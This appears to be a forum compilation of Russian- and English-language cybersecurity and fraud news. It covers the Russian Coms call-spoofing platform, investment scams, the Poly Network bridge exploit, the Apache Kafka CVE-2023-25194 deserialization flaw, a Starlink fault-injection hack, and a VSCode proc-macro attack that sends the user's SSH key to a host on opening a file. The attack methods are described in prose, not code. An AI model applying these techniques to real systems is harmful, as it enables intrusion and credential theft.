НКЦКИ рекомендует отказаться от использования браузера «Спутник» в Ваших организациях и личных целях и приводит в своём бюллетене перечень ранее принадлежавших компании ООО «Спутниклаб» доменных имен, которые могут быть использованы злоумышленниками.
safe-surf.ru/specialists/news/710262
Правоохранительные органы Великобритании объявили о закрытии платформы Russian Coms, которая использовалась сотнями мошенников для обмана жертв по всему миру. Платформа, основанная в 2021 году, привела к финансовым потерям на десятки миллионов фунтов стерлингов, и около 170 000 человек в Великобритании стали её жертвами.
Жертвами стали люди всех возрастов, и звонки совершались в 107 стран мира, включая США, Новую Зеландию, Норвегию, Францию и Багамы. В период с 2021 по 2024 год преступники использовали платформу для более чем 1,3 миллиона звонков с 500 000 уникальных номеров в Великобритании. Средние убытки составляли свыше 9 400 фунтов стерлингов.
Сотни преступников заключали 6-месячные контракты стоимостью от 1 200 до 1 400 фунтов стерлингов в криптовалюте для использования основных услуг Russian Coms. Сервис активно продвигался через Snapchat, Instagram и Telegram и был доступен сначала как отдельное устройство, а затем как веб-приложение, предоставляющее пользователям зашифрованные звонки, веб-телефон, отсутствие логов, мгновенное стирание данных, изменение голоса, международные звонки и круглосуточную поддержку.
Телефон Russian Coms можно было использовать только для совершения поддельных звонков. В устройство было загружено несколько фейковых нефункциональных приложений, чтобы телефон выглядел как обычный смартфон в случае изъятия правоохранительными органами. Также на устройстве были установлены несколько VPN-приложений для скрытия IP-адреса и приложение для мгновенного стирания данных.
Russian Coms позволяла преступникам скрывать свою личность, делая звонки с подменных номеров финансовых учреждений, телекоммуникационных компаний и правоохранительных органов. Примером типичного мошенничества было использование поддельного номера банка для завоевания доверия жертвы. Преступники убеждали жертву, что её счёт подвергся мошенничеству, и предлагали перевести деньги на «безопасный счёт» для сохранности средств.
Преступники также представлялись известными авторитетными компаниями и похищали средства за товары, которые никогда не доставлялись. Злоумышленники получали полный доступ к банковским счетам и организовывали сбор физических дебетовых и кредитных карт у жертв под предлогом их замены.
Трое человек были арестованы сотрудниками NCA, двое из которых подозреваются в создании и развитии платформы. Они были освобождены под залог. Правоохранительные органы Великобритании вместе с партнерами из других стран при поддержке Европола будут совместно действовать против пользователей платформы в ближайшие месяцы. NCA также разместило сообщение в Telegram-канале Russian Coms после захвата.
nationalcrimeagency.gov.uk/news/nca-shuts-down-major-fraud-platform- responsible-for-1-8-million-scam-calls
GitHub [опубликовал](https://github.blog/2024-04-18-a-policy-proposal-on-our- approach-to-deepfake-tools-and-responsible-ai/) изменения правил, определяющих политику в отношении размещения проектов, которые можно использовать для создания фиктивного мультимедийного контента с целью порномести и дезинформации. Изменения пока находятся в состоянии черновика, доступного для обсуждения в течение 30 дней (до 20 мая).
В условия использования сервиса GitHub добавлен абзац, запрещающий размещение проектов, предназначенных для синтезирования и манипулирования мультимедийным контентом для создания интимных образов без согласия (NCII) и контента, нацеленного на введение в заблуждение или дезинформацию. Запрет также распространяется на проекты, которые поощряют, продвигают и поддерживают подобные системы.
В качестве причины введения запрета упоминается попытки использовать системы искусственного интеллекта, способные генерировать реалистичные изображения, звук и видео, не только для творчества, но и для злоупотреблений, таких как создание дипфейков и организация спамерских обзвонов.
При этом представители GitHub намерены лояльно относиться к проектам двойного назначения, напрямую не предназначенным для злоупотреблений и не одобряющим вредоносное применение, но которые потенциально могут применяться злоумышленниками в своей деятельности. Меры реагирования будут выбираться с учётом характера проектов и разделяя использование для неправомерных и законных целей.
В Ростове-на-Дону суд вынес приговор в отношении мужчины, который похитил 5 млн руб. в ходе сделки с криптовалютой. Вот основные детали этого инцидента:
Совершение преступления: В августе 2022 года Мирзаханян А.М. вместе со своим сообщником устроил засаду в офисе в Ростове-на-Дону, где проходила сделка по продаже криптовалюты. С угрозой использования оружия они похитили 5 млн руб. и скрылись с места преступления.
Квалификация преступления: Суд квалифицировал это преступление как разбой, совершенный группой лиц с целью хищения крупной суммы имущества. Согласно статье УК РФ, Мирзаханян был приговорен к восьми годам лишения свободы в исправительной колонии строгого режима.
Прецедент в Рязани: Этот случай стал не первым, связанным с криптовалютой и судебным решением в России. В Рязани мужчина был осужден на 11 лет за отмывание биткоинов и наркоторговлю. Важно отметить, что Верховный суд РФ ранее приравнял перевод криптовалюты в рубли к легализации незаконных доходов.
Эти судебные решения подчеркивают важность законодательного регулирования криптовалютного пространства и строгости судебного преследования лиц, совершающих преступления с использованием цифровых активов.
Скоро на скамью подсудимых попадут двое молодых жителей Смоленска, которые помогали мошенникам, действующим по схеме "Ваш родственник попал в ДТП".
Двое приятелей откликнулись на объявление неизвестного лица, предлагающего
незаконный заработок, через один из мессенджеров. Один из обвиняемых забирал
деньги у пострадавших от телефонных мошенников и переводил их на указанные
счета, а задачи второго включали заказ такси и наблюдение за окружающей
обстановкой при совершении краж наличности.
Общая сумма украденных денег составляет 3 миллиона рублей.
Мошенники по стандарту звонили пострадавшим и убеждали их в аварии и необходимости передать деньги на лечение или урегулирование уголовного дела родственников. Пострадавшие передавали от 100 до 800 тысяч рублей.
Мошенники обещали инвесторам доходность 12% в месяц на торговле криптовалютой, но все оказалась обычной финансовой пирамидой.
Сотрудники правоохранительных органов в Москве арестовали главу инвестиционного фонда «Благополучие» Виталия Соколовского и основателя криптовалютной биржи Intelex Виталия Павлова. Они обманывали людей, предлагая им инвестировать в криптовалюту с обещанием высоких дивидендов в размере 12% в месяц.
Фонд работал как финансовая пирамида, где деньги более ранних участников
использовались для выплаты процентов новым вкладчикам. Они также запустили
криптовалютную биржу, где клиенты должны были внести депозит от $1000, но в
итоге все полученные деньги присвоили себе.
Помимо Москвы, филиалы фонда работали в других российских городах.
В минувшие выходные проект DeFi Poly Network подвергся серьезному взлому, в ходе которого злоумышленнику удалось сгенерировать «из воздуха» миллиарды криптовалют на разных блокчейнах.
Хакер воспользовался уязвимостью в протоколе межсетевого моста, создав криптоактивы BUSD, BNB и SHIB на различных блокчейнах. В частности, хакеры сгенерировали 24 млрд BUSD и BNB на Metis и 999 трлн SHIB на Heco. Позднее команда Poly Network уточнила, что эксплойт затронул 57 криптоактивов в 10 блокчейнах, включая Ethereum, BNB Chain, Polygon, Avalanche, Heco и Metis. Предполагаемая прибыль хакера от взлома колеблется от $400 000 до $4 млн.
В воскресенье, 2 июля, платформа приостановила обслуживание пользователей. Руководство Poly Network сообщило, что обратилось за помощью к централизованным биржам и правоохранительным органам. Специалисты платформы порекомендовали держателям криптовалют вывести ликвидность и разблокировать токены LP, поставленные пользователями.
Аналитик по безопасности проектов DeFi, использующий в Твиттере псевдоним 0xArhat, написал, что эксплойт возник в результате уязвимости смарт-контракта. Это позволило хакеру создать вредоносный параметр с фальшивой подписью валидатора и заголовком блока. Смарт-контракт принял этот параметр, и хакер смог обойти процесс проверки, после чего стал выпускать токены из пула эфиров Poly Network и отправлять их на свой адрес в блокчейнах Metis, BNB Chain и Polygon.
Эта процедура неоднократно повторялась, что позволило накопить большой объем криптоактивов. По словам аналитика, в какой-то момент на кошельке хакера накопились криптоактивы на сумму около $42 млрд, однако злоумышленник смог продать лишь часть из них, из-за ограниченного рыночного спроса.
Это уже не первый случай, когда Poly Network сталкивается с крупной атакой. В августе 2021 года платформа потеряла около $611 млн. Однако в том же месяце взломщик вернул все украденные криптоактивы. После того взлома Poly Network совместно с платформой Immunefi запустила программу по обнаружению уязвимостей.
This critical vulnerability is tracked as CVE-2023-25194 and was reported on February 8.
The vulnerability has the potential to enable a remote attacker with authentication to run any code on the system. This is due to unsafe deserialization that occurs during the configuration of the connector through the Kafka Connect REST API.
The vulnerability can only be triggered when there is access to a Kafka Connect worker – a logical work unit component – and the user must also be able to create or modify worker connectors with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol. It involves Lightweight Directory Access Protocol (LDAP) and Java Naming and Directory Interface (JNDI) endpoints.
An authenticated attacker can configure the sasl.jaas.config property for any of the connector’s Kafka clients to “com.sun.security.auth.module.JndiLoginModule“. It is possible via the following properties:
The server then establishes a connection to the LDAP server of the attacker and deserializes the LDAP response. The attacker can then use it to launch java deserialization gadget chains on the Kafka connect server.
Sources:
<https://portswigger.net/daily-swig/remote-code-execution-flaw-patched-in-
apache-kafka>
[https://www.news.de/technik/8567359...-versionen-und-updates-fuer-
cve-2023-25194/1/](https://www.news.de/technik/856735932/apache-kafka-
gefaehrdet-it-sicherheitswarnung-vom-bsi-und-bug-report-betroffene-systeme-
und-produkte-neue-versionen-und-updates-fuer-cve-2023-25194/1/)
<https://socradar.io/patch-released-for-cve-2023-25194-rce-vulnerability-in-
apache-kafka/>
https://hackerone.com/reports/1529790
Для того чтобы помочь клиенту, искусственный интеллект будет давать
консультации через наушник
В США в феврале пройдет первое судебное дело, которое возьмет робот-адвокат.
Дело касается выплаты штрафа за превышение скорости.
Как сообщает издание Daily Mail, искусственный интеллект от стартапа DoNotPay
будет работать через смартфон и прослушивать судебные аргументы в режиме
реального времени. После чего робот будет сообщать ответчику в наушники, что
ему необходимо сказать в свою защиту. Кроме того, технология настроена так,
что ИИ не реагирует автоматически на все, что слышит в суде. Вместо этого он
выслушивает аргументы и анализирует их, а затем инструктирует ответчика.
Местонахождение здания суда, суть обвинения и имя обвиняемого не раскрываются.
Также суду будет не известно о помощи искусственного интеллекта во время
слушаний.
Так как во многих странах телефоны и устройства, подключенные к интернету,
запрещены в судах, чтобы избежать ограничения, компания полагается на
стандарты публичности слушаний, позволяющие использовать Apple AirPods.
В случае проигрыша разработчики обещали оплатить все штрафы.
По словам основателя и генерального директора компании Джошуа Браудера, его
конечная цель состоит в том, чтобы приложение полностью заменило некоторых
адвокатов для экономии денег подсудимых.
Мод-чип позволяет обойти защиту и выполнить произвольный код.
Бельгийский исследователь безопасности успешно взломал спутниковую интернет- систему SpaceX Starlink, используя самодельную печатную плату, разработка которой стоит около $25. О своей разработке исследователь рассказал в презентации на конференции Black Hat USA 2022 .
Леннерт Ваутерс разобрал спутниковую антенну и создал специальную плату – мод- чип, который можно прикрепить к тарелке. После подключения к антенне Starlink мод-чип запустил атаку внедрения ошибок (fault-injection) и привел ко временному замыканию системы, чтобы вызвать сбой и обойти средства защиты Starlink.
С помощью самодельного инструмента Ваутерс получил root-доступ, взломав загрузочный диск центра управления безопасностью пользовательского терминала Starlink UT (спутниковая антенна, которую люди используют для доступа к системе).
Чтобы спроектировать мод-чип, Ваутерс отсканировал тарелку Starlink и создал дизайн, подходящий для существующей платы Starlink. Он припаял мод-чип к существующей печатной плате Starlink и соединил ее с помощью нескольких проводов. Самодельный мод-чип состоит из:
микроконтроллера Raspberry Pi RP2040;
флеш-памяти;
электронных переключателей;
регулятора напряжения.
[](https://www.securitylab.ru/upload/images/content- img(290).png)
После подключения к тарелке Starlink инструмент запустил атаку с внедрением ошибок, чтобы временно закоротить систему. Это позволило обойти средства защиты Starlink, чтобы Ваутерс мог проникнуть в заблокированные части системы.
Атака Ваутерса привела к сбою первого загрузчика — загрузчика ПЗУ, который прошит в систему на кристалле (System On a Chip, SoC) и не может быть обновлен. Затем он развернул исправленную прошивку на более поздних загрузчиках, что дало ему контроль над тарелкой. По словам специалиста, эта атака приводит к неустранимой компрометации Starlink UT и позволяет выполнять произвольный код.
Когда Ваутерс получил root-доступ в Starlink UT, он смог изучить сеть Starlink и ее каналы связи. Эксперт добавил, что другие исследователи могут использовать эту работу для дальнейшего изучения экосистемы Starlink.
Воутерс сообщил об уязвимости SpaceX через программу Bug Bounty, прежде чем публично представить эту проблему. SpaceX уже отреагировала на презентацию Ваутерса шестистраничным документом , в котором исследователям безопасности предлагается «выявить ошибки», чтобы помочь компании лучше защитить систему Starlink. Также в документе SpaceX рассказала, как она защищает систему Starlink.
В опубликованном документе SpaceX назвала исследование Ваутерса «впечатляющим с технической точки зрения», а также заверила, что этот взлом может повлиять только на одно устройство, а вся сеть и пользователи находятся в безопасности.
source:
blackhat.com/us-22/briefings/schedule/index.html#glitched-on-earth-by-humans-
a-black-box-security-evaluation-of-the-spacex-starlink-user-terminal-26982
twitter.com/LennertWo/status/1527212523182776320
bugcrowd.com/spacex/hall-of-fame
api.starlink.com/public-
files/StarlinkWelcomesSecurityResearchersBringOnTheBugs.pdf
VPN-провайдеру Surfshark кажется, что «параноидальных» пользователей слишком мало, поэтому чересчур беспечных надо напугать.
Самые «параноидальные» интернет-пользователи прекрасно понимают наихудшие варианты развития событий, если их персональные данные попадут в руки хакеров. Однако VPN-провайдеру Surfshark кажется, что их слишком мало, поэтому он решил хорошенько напугать чересчур беспечных пользователей с помощью классических фильмов ужасов.
Специалисты выделили пять основных киберугроз, которым подвержены пользователи в интернете, и для каждой из них нарисовали постер, на создание которого их вдохновила та или иная кинокартина. Скачать постеры можно на странице Digital Nightmares («Цифровые кошмары») на сайте Surfshark.
Кража личности – вдохновитель: фильм «Головокружение» (реж. Альфред Хичкок)
На психоаналитическом уровне личность — это коктейль из переживаний, отношений и желаний. Но когда дело доходит до финансовой безопасности, личность представляет собой мозаику из вырезанных и склеенных имен и цифр. Когда мошенники взламывают пароль или систему, это только вопрос времени, когда они создадут убедительного «двойника» жертвы и начнут ее разорять.
Фишинг – вдохновитель: фильм «Прочь» (реж. Джордан Пил)
«Фишинг», то есть, «рыбалка» – это когда киберпреступники забрасывают наживку и ждут, пока жертва клюнет. Приманка может быть в виде поддельного текстового сообщения или электронного письма от банка. Нажав на ссылку, пользователь загружает на свое устройство вредоносное ПО или попадает на поддельный сайт, где ему нужно ввести свои учетные данные, якобы для подтверждения, которые на самом деле отправляются в руки злоумышленников.
Биометрическая аутентификация – вдохновитель: фильм «Бегущий по лезвию» (реж. Ридли Скотт)
Кибербезопасность всегда была гонкой вооружений. Хакеры и невинные пользователи используют все более изощренные средства, чтобы перехитрить друг друга. Но что происходит, когда следующим полем битвы становится лицо? Благодаря технологии распознавания лиц черты лица становятся биометрическими данными. И везде, где эти «данные» видны (привет, Instagram), пользователи уступают драгоценное место в битве за конфиденциальность и безопасность.
Шпионское ПО – вдохновитель: фильм «Ведьма из Блэр: Курсовая с того света» (реж. Дэниел Мирик и Эдуардо Санчес)
Шпионское ПО – это программное обеспечение, которое прячется на устройстве жертвы и пересылает текстовые сообщения, пароли, данные о местоположении и даже данные с камеры и микрофона удаленному агенту. То есть, шпионит. Мошенники используют этот доступ, чтобы украсть личность или передать ценные данные рекламодателям и другим агентствам. А программное обеспечение Pegasus, разработанное израильской компанией NSO Group, занимающейся кибероружием, даже использовалось для слежки за журналистами и активистами.
DDoS-атаки – вдохновители: фильмы «Армагеддец» и «Зомби по имени Шон» (реж. Эдгар Райт)
Распределенный отказ в обслуживании (DDoS) происходит тогда, когда хакеры перегружают сервер или сеть интернет-трафиком, что приводит к сбою. Когда геймер узнает IP-адрес своего конкурента, он может атаковать его систему и замедлить соединение (и, соответственно, игровые способности) до полной остановки.
source: surfshark.com/digital-nightmares
Group-IB, обнаружила более 50 различных схем фейковых инвестпроектов и более 8 000 доменов, связанных с мошеннической инфраструктурой. Желающим быстро разбогатеть предлагают вкладываться в криптовалюты, покупку акций нефтегазовых компаний, золото, фармацевтику и другие «активы». На деле все оборачивается хищением денег свежеиспеченных инвесторов или данных их банковских карт. Большинство исследованных кейсов являются технически новыми «гибридными схемами» — в них наряду с традиционным фишингом используются фейковые мобильные приложения-терминалы, а так же звонки «личных консультантов».
Мошенничество с фейковыми инвестпроектами наблюдается, как минимум, с 2016 года. Массовое распространение оно получило в 2018-2020 гг во время бума частного инвестирования в России. А с начала 2021 года специалисты CERT-GIB зафиксировали взрывной рост инвестиционных интернет-афер — за 9 последних месяцев было зарегистрировано уже на 163% больше доменов под инвестпроекты, чем за все предыдущие годы.
В целом с момента активного распространения схемы — в 2018 году — до третьего квартала 2021 года, благодаря системе графового анализа сетевой инфраструктуры, специалисты Group-IB обнаружили более 8 000 доменов, задействованных в реализации мошеннических инвестпроектов. Примечательно, что только один злоумышленник с одного почтового адреса с июня по июль 2021 года зарегистрировал 322 домена, которые планировал использовать для обмана горе- инвесторов. В свою очередь, Центр круглосуточного реагирования на киберинциденты CERT-GIB выявил свыше 50 шаблонов лендинг-страниц с различными готовыми инвестиционными сценариями о том, как надо вкладывать деньги, чтобы «быстро разбогатеть без особых усилий». К примеру, лишь одна группа из 150 человек потеряла около 300 млн. рублей ($4,0 млн), купив биткоины под видом инвестиций на «брокерских биржах» — об этом обманутые инвесторы сами сообщили в Group-IB.
Сверхдоходы — народу!
Весной 2021 года специалисты CERT-GIB заметили массированную рекламную кампанию в социальных сетях, в которой известные предприниматели, политики или амбассадоры брендов «предлагали» частным вкладчикам участие в сверхдоходных инвестиционных проектах. Чаще других в фейковых постах фигурировал создатель Telegram Павел Дуров, который якобы «вопреки запретам» создал для россиян блочкейн-платформу «Gram Ton» — «оплот цифрового сопротивления». В своих рекламных постах мошенники нелегально использовали, в том числе изображения г-на Дурова и три откровенно популистских сюжета мошенничества:
1. «Альтернатива банкам» — о появлении новой финансовой платформы, позволяющей получать инвесторам невероятные доходы;
2. «Недра — народу!» — о «нацпроектах» по освоению сверхдоходов от торговли нефтью и газом;
3. Финансы для людей» — о допуске к «закрытым» для большинства инвест- инструментам реальных финансовых организаций.
В качестве оформления лендингов и рекламных постов с призывами инвестировать в сомнительные проекты злоумышленники нелегально использовали стилистику популярных новостных ресурсов, таких как «Россия-24», Russia Today или РБК. Естественно, к реальным медиа-компаниям данные страницы не имели никакого отношения.
Как украсть миллион: опросы, звонок оператора и мобильные терминалы
Как только начинающий инвестор клюет на «приманку», его направляют на сайт- опросник от «известного банка» или на красочные лендинги-одностраничники инвестпроекта. Как правило, все они связаны с торговлей «криптой», фиатными валютами, драгметаллами, полезными ископаемыми, природными ресурсами, фармацевтикой. Практически каждый из проектов обещает фантастические заработки — в 300 000 до 10 000 000 рублей в месяц. Задача мошенника — заставить жертву поверить в инвестпроект, чтоб та оставила свои контактные данные для связи с «личным консультантом».
Рассказав по телефону про уникальный проект, где якобы специальная программа- бот помогает зарабатывать деньги на торгах, «консультант» предлагает пользователю зарегистрироваться в системе и внести депозит от $250. Если клиент сомневается, ему могут посоветовать забронировать место в проекте, внеся аванс, например, в размере 10 000 руб через популярный обменник криптовалют. При подключении к системе в «личном кабинете» будущему инвестору демонстрируют успешные результаты торговли, рост его сбережений, но за красивыми цифрами скрывается пустота — все эти инвестпроекты не предполагают снятие средств, только зачисление.
В ряде случаев менеджер просит сообщить данные банковской карты (включая секретные коды), с помощью которой потенциальный «участник» планирует делать инвестиции, и якобы отправляет запрос в банк на одобрение внесения депозита. На самом деле деньги просто списываются со счета. Как и в популярных вишинговых схемах со звонком «сотрудника банка», оператор постоянно «ведет» жертву по скрипту, подбадривая или уговаривая выполнить все необходимые условия.
Кроме описанного сценария, специалисты CERT-GIB выявили полностью автоматизированную схему, обман в которой происходит без участия человека. С рекламного поста в соцсети жертву направляют прямиком в GooglePlay, где начинающему инвестору необходимо загрузить мобильное приложение — торговый терминал. После короткого обучающего курса инвестор вносит депозит, составляющий $250, $500 или $1000, который, естественно, не возвращается. Если начинающий игрок спустя какое-то время захочет все-таки вывести свои виртуальные деньги, система предлагает ему оплатить «комиссию платежного шлюза». Таким образом с помощью мошеннического торгового терминала инвестора обманывают повторно.
"В каждой легенде предлагался свой уникальный подход и техника заработка. Мошенники, разрабатывающие эти шаблоны, подошли к задаче достаточно креативно, а столь широкая вариативность мошеннических сценариев в рамках этой схемы может свидетельствовать об ее успешности, что, в свою очередь, приведет к появлению новых сценариев обмана".
Эксперты Group-IB предупреждают, что итог участия в подобных инвестпроектах в большинстве случаев одинаков — в погоне за сверхдоходами люди могут потерять все свои накопления и, более того, оказаться в кредитной кабале.
Несмотря на экономические санкции и запрет деятельности в Украине российских компаний, многие отечественные интернет-фрилансеры по-прежнему продолжают негласно работать с российскими заказчиками и получать гонорары через запрещенные системы электронных платежей. Для таких людей остро стоит вопрос вывода заработанных денег на украинские счета.
С одной стороны, производить перевод денег, их обмен и обнал в Украине имеют право только банки или небанковские финансовые учреждения, которые имеют соответствующую лицензию Нацбанка на перевод денег без открытия счетов.
С другой стороны, даже если бы подобные организации хотели оказывать услуги по обмену электронных денег из России, согласно требованию украинского законодательства, платежные системы, которые используются, обязательно должны быть зарегистрированы и внесены в соответствующий Реестр (естественно, в виду экономических санкций, на сегодняшний день, в этом реестре нет российских платежных систем).
Осознавая уникальную востребованность этой ниши, украинский предприниматель из Кировоградской области, создал сайт-обменник, который начал предоставлять посетителям услуги по выводу и обналичиванию денег из российских платежных систем «WebMoney Transfer», «Money.Yandex.ru», «QiwiWallet», а также их обмену на гривны, доллары и российские рубли.
Как отмечено в материалах судебного решения, мужчина пошел на этот шаг, в нарушение требований п. 1 ч. 9.3 ст. 9, п.п. 4, 5 ч. 15.4 ст. 15 Закона Украины «Про платежные системы и перевод денег в Украине», п.3.5 главы 3 Положения «Про электронные деньги в Украине», утвержденного Постановлением Правления Национального банка Украины №481 от 04.11.2010, решения СНБОУ «Про применение персональных специальных экономических и других ограничительных мероприятий (санкций)» от 28.04.2017 года, введенного в действие Указом президента Украины № 133/2017, решения СНБОУ «Про применение персональных специальных экономических и других ограничительных мероприятий (санкций)» от 02.05.2018 года, введенного в действие Указом президента Украины № 126/2018.
В рамках возбужденного, по факту деятельности «менялы», уголовного дела (ч.1 ст. 200 УК – незаконные операции с электронными деньгами), упоминаются несколько валютных операций. Например, получил от клиента 1331 российский рубль через платежную систему, после чего отправил на карту Приватбанка гривневый эквивалент, в размере 498 грн. Размер комиссионного вознаграждения за операцию составил 34,5 грн. Еще 4 упомянутых транзакции позволили обвиняемому неправомерно заработать 11, 25 и 85 гривен.
Разумеется, вряд ли эти деньги – все, что удалось заработать меняле. Однако, в целом, масштаб предприятия, который вырисовывается, вовсе не такой уж грандиозный, поэтому его наказание выглядит, скорее, как публичная порка в назидание остальным участникам теневого рынка.
За свои незаконные валютные операции с использованием электронных денег, совершенные повторно, подсудимый получил наказание в виде штрафа, в размере 5 тысяч необлагаемых налогом минимумов дохода граждан (85 тысяч гривен). Помимо этого, подсудимый обязан возместить расходы на привлечение экспертов, которые составили 13076 грн.
Продемонстрирован метод атаки на редактор кода VSCode, позволяющий передать произвольные файлы в рамках прав текущего пользователя при открытии в редакторе специально оформленного исходного кода. В предложенной демонстрации при открытии кода на языке Rust, в котором используется процедурный макрос, выполняется установка соединения с хостом 127.0.0.1:8080 и отправка содержимого файла "~/.ssh/id_rsa" с SSH- ключами пользователя.
Для компрометации достаточно просто открыть файл с кодом без выполнения каких- либо других действий с проектом. Для работы примера требуется наличие в VSCode плагина rust-analyzer (обвязка над штатным компилятором rustc) и наличие в системе инструментария для работы с кодом на языке Rust. Проблема связана с раскрытием процедурных макросов во время начального анализа кода. Аналогичного эффекта также можно добиться во время компиляции с использованием команды "cargo build".
Отмечается, что проблема может затрагивать другие редакторы кода и языки программирования. VSCode и rust-analyze использованы лишь для демонстрации вектора атаки. Теоретически проблеме подвержен любой редактор кода, раскрывающий процедурные макросы, которые позволяют создавать расширения синтаксиса и выполнять код на этапе компиляции. Изначально исследователь изучал возможность совершения вредоносных действий во время компиляции кода, но обнаружил, что процедурные макросы раскрываются при обработке исходных текстов в редакторах кода. Вероятно, атака может затрагивать и другие языки программирования, например, в Java похожим образом можно манипулировать с обработкой аннотаций.
В объявлениях перечислялось, чем увлекается человек, где находится и другая информация, составленная на основе его данных из соцсети.
Представитель Signal рассказал о необычном эксперименте — мессенджер купил у Facebook рекламу в Instagram и показывал в баннерах на пользовательских устройствах текущие параметры таргетинга в понятной форме.
В рекламных объявлениях каждый пользователь мог увидеть часть личных данных о себе, которые собирает соцсеть и впоследствии продает к ним доступ. В частности, можно было увидеть информацию о работе, геолокации, отношениях, личных интересах.
Пользователи видели такое сообщение на баннере: «Вам показывается эта реклама, потому что вы учитель, вас зовут Лео, вы разведены, живете в Техасе, любите мотоциклы и бокс».
Facebook это не понравилось и все объявления были забанены. Рекламный аккаунт Signal также оказался заблокированным.
Ранее Facebook и Instagram попросили разрешить сбор данных, чтобы "оставаться бесплатными". Приложения информировали пользователей, что это необходимо для показа персонализированной рекламы, поддержки бизнеса компаний, которые зависят от рекламы, а также для того, чтобы соцсети Facebook и Instagram оставались бесплатными для пользователей.
Злоумышленники смогли получить доступ к конфиденциальной информации о здоровье умерших доноров и реципиентов органов.
Американская некоммерческая организация Midwest Transplant Network сообщила об утечке данных, затронувшей более 17 тыс. человек. Операторы вымогательского ПО взломали сеть организации в феврале нынешнего года и заблокировали доступ к системам.
Как сообщили представители Midwest Transplant Network в письме пострадавшим, злоумышленники смогли получить доступ к конфиденциальной информации о здоровье умерших доноров и реципиентов органов, включая сведения об именах, датах рождений и типах процедур донорства или трансплантации органов.
Представители компании не сообщили, заплатила ли Midwest Transplant Network выкуп за восстановления доступа к своим файлам.
У Midwest Transplant Network нет оснований полагать, что преступники продали или иным образом распространяли полученные данные. Письмо, информирующее семьи об инциденте, было отправлено только на прошлой неделе, поскольку «в организации хотели точно составить список пострадавших».
В Алтайском крае осудили двоих молодых людей, которые продали данные своих банковских карт неизвестным злоумышленникам. Как сообщили в Объединенной пресс-службе судов Алтайского края, на связь с будущими дропами вышел неизвестный человек в Telegram.
«От них требовалось всего лишь передать право пользования принадлежащей им платежной картой с привязанным к ней расчетным счетом банка-эмитента с указанием паролей и кодов доступа для совершения по ней приема, выдачи, перевода денежных средств третьим лицам», — говорится в сообщении пресс- службы.
Молодые люди не сообразили, что становятся дропами, и не увидели в этой сделке ничего противозаконного, хотя в условиях открытия и обслуживания счетов было указано не недопустимость передачи их третьим лицам. Алтайцев повели по ч. 1 ст. 187 УК РФ (сбыт электронных средств, предназначенных для неправомерного осуществления приема, выдачи денежных средств). Обоих признали виновными, они получили по шесть месяцев условного срока.
t.me/tgsudalt/2957
Печерской окружной прокуратурой города Киева направлен в суд обвинительный акт в отношении организатора и членов организованной преступной группы по обвинению в совершении умышленных тяжких и особо тяжких преступлений, связанных с завладением денежными средствами граждан Украины мошенническим путем (ч. 4 ст. 190, ч. 3 ст. 28, ч. 5 ст. 361, ч. 2 ст. 361 ст. 361 ч.
Согласно материалам следствия, участники группы разработали совместный план преступных действий, направленный на завладение средствами граждан Украины. Для реализации схемы участники создали ряд тематических Telegram каналов, связанных с инвестиционными проектами по торговле финансами и криптовалютой.
Среди них «yar invest», «yar investment», «yargoldinv», «яр фрынчер», «ян фрынчер», «яр», «амир миллионер», «рамзанов амир», «инвестиции амира», «ramzantrade», «investramzanov»
Для увеличения объемов аудитории телеграм-каналов члены организованной группы наладили их рекламирование путем осуществления спам-рассылки. При этом они использовали аккаунты реальных пользователей, которыми завладевали с помощью заранее созданных ими фишинговых-ботов, маскировавших от официальные чат-боты компании ДТЭК.
По данным следствия, злоумышленники осуществили несанкционированное вмешательство в более 15 тысяч аккаунтов и систематически завладевали мошенническим путем денежными средствами граждан Украины.
Организатором и членами преступной группы оказались граждане Украины, жители Одесской области.
Компьютерная техника и серверное оборудование, которое служило орудием совершения уголовных правонарушений, изъяты. Работа фишинговых ботов заблокирована.
Досудебное расследование осуществлялось следственным отделом Печерского УП ГУНП в городе Киеве при оперативном сопровождении Департамента киберполиции ЧП Украины.
Айнура Зайдуллина уличили в систематических кражах в течение трех лет. Его коллегу уже судят.
«Мы полагаем, что на сегодняшний день как объявление в розыск, так и привлечение в качестве обвиняемого являются преждевременными», — говорил в суде адвокат Айнура Зайдуллина. Менеджера отдела частного обслуживания казанского филиала Газпромбанка подозревают в краже денег со счетов премиальных клиентов с использованием якобы подложных банковских карт на их имена. Позиция самого Зайдуллина неясна: по всей видимости, он скрывается за границей, куда, по словам его защитника, уехал давно. Одна из предполагаемых подельниц Зайдуллина уже пошла под суд.
В казанском филиале Газпромбанка недосчитались солидной суммы. Причем обнаружили хищение еще в начале года, но достоянием общественности эта история стала лишь накануне. Собственное расследование и работа оперативников УБЭП показали, что следы ведут к нескольким сотрудникам самого банка. Одной из них оказалась менеджер отделения Гульнара Мифтахова — она уже попала на скамью подсудимых, ей вменяют кражу 14 млн рублей. Но, со слов наших источников, у рядовой работницы вряд ли могли получиться подобные махинации без помощи. Как установили в ходе расследования, одним из таких предполагаемых помощников мог стать 34-летний Айнур Зайдуллин.
Мужчина трудился в банке в отделе частного обслуживания. В марте 2023 года он стал фигурантом уголовного дела о краже в особо крупном размере (ч. 4 ст. 158 УК РФ). Максимальное наказание по этой статье — лишение свободы на срок до 10 лет. Чуть позже, примерно в мае и июне, следователи возбудили еще два уголовных дела, которые соединили в одно производство. Зайдуллин — пока единственный фигурант, не считая «неустановленных лиц».
Его подозревают в краже, по нашим данным, 63 млн рублей со счетов нескольких премиальных клиентов банка. При этом, считает следствие, кражи продолжались в течение трех лет, как минимум с 2020 года. Как Зайдуллину удавалось оставаться незамеченным? Это пока неясно. По версии следствия, он оформлял на реальных клиентов банка подложные банковские карты. А после якобы составлял фиктивные документы от имени этих клиентов, которые давали добро на перевод денег со своих счетов на свои же (подложные) банковские карты.
Обвинение Зайдуллину предъявили еще 23 мая, а уже 30 мая объявили в международный розыск. Его разыскное дело есть на сайте МВД: там размещена фотография мужчины в костюме с красным галстуком.
Click to expand...
Обвинение Зайдуллину предъявили еще 23 мая, а уже 30 мая объявили в международный розыск. Его разыскное дело есть на сайте МВД: там размещена фотография мужчины в костюме с красным галстуком. Также указано, что он родился в Кукморе, ему 34 года, основание для розыска — «статья УК».
Почти через месяц, 27 июня, следствие обратилось с требованием заочно арестовать Зайдуллина. Суд прошение удовлетворил. Но мужчина с этим решением не согласился и подал жалобу. Его интересы в Верховном суде РТ представлял тогда адвокат Юрий Некрасов , сам Зайдуллин — как несложно догадаться — не присутствовал.
